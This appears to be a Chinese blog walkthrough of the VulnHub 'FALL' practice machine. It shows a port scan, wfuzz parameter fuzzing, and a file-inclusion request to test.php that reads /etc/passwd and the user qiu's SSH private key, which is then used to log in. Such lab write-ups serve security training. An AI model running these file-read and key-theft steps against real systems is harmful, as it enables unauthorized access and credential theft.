VulnHub-FALL通关攻略

第一步:确定靶机IP为192.168.40.129
第二步:扫描后台及开放端口
复制代码
#开放端口
22 --- ssh
25 --- SMTP简单邮件传输协议
80 --- HTTP万维网传输信息协议
110 --- POP3邮件协议3
139 --- NetBIOS服务
443 --- 	https服务
445 --- SMB协议
3306 --- Mysql
8080 --- Internet 信息服务
第三步:尝试访问扫到的端口和文件
第四步:尝试使用kali自带的FUZZ
复制代码
#使用kali自带的FUZZ
wfuzz -u "http://192.168.40.129/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80
第五步:尝试访问/etc/passwd敏感文件,发现qiu用户,且权限为1000
复制代码
#/etc/passwd
http://192.168.40.129/test.php?file=/etc/passwd
第六步:尝试查看用户qiu的 ssh 密钥
复制代码
#查看用户qiu的 ssh 密钥  
http://192.168.40.129/test.php?file=/home/qiu/.ssh/id_rsa
第七步:尝试利用文件包含来得到qiu的ssh私钥文件,并使用cat查看
复制代码
#得到ssh私钥文件
curl http://192.168.40.129/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa
第八步:给予密钥文件权限为600,以正常使用
复制代码
chmod 600 id_rsa
第九步:使用这个私钥登录qiu用户,发现连接成功
复制代码
 ssh -i id_rsa qiu@192.168.40.129

FROM IYU_

相关推荐
unable code1 小时前
攻防世界-Misc-Miscellaneous-200
网络安全·ctf·misc
zhengfei6112 小时前
渗透工具集——15款常见C2的框架
测试工具·安全
星哥说事3 小时前
系统安全加固:禁用不必要服务和端口,及时更新安全补丁
安全·系统安全
unable code4 小时前
攻防世界-Misc-4-1
网络安全·ctf·misc·1024程序员节
金灰5 小时前
写在创作第 730 天:一些关于学习、技术与自我认知的记录
学习·安全
Dingdangr6 小时前
基于Python的火焰识别系统设计与实现(含论文、开题报告及答辩PPT)
java·python·测试工具·安全
金灰6 小时前
一带一路(金砖)--网络安全防护治理赛项
网络·计算机网络·安全·web安全·网络安全·网络攻击模型·安全威胁分析
Bruce_Liuxiaowei6 小时前
网站敏感文件_目录大全(分类记忆+风险标注)
运维·网络·网络协议·http·网络安全·https
脆皮瞎7 小时前
内网域渗透-信息收集
网络·网络安全
独角鲸网络安全实验室7 小时前
高危预警!React核心组件曝CVSS 9.8漏洞,数百万开发者面临远程代码执行风险
运维·前端·react.js·网络安全·企业安全·漏洞·cve-2025-11953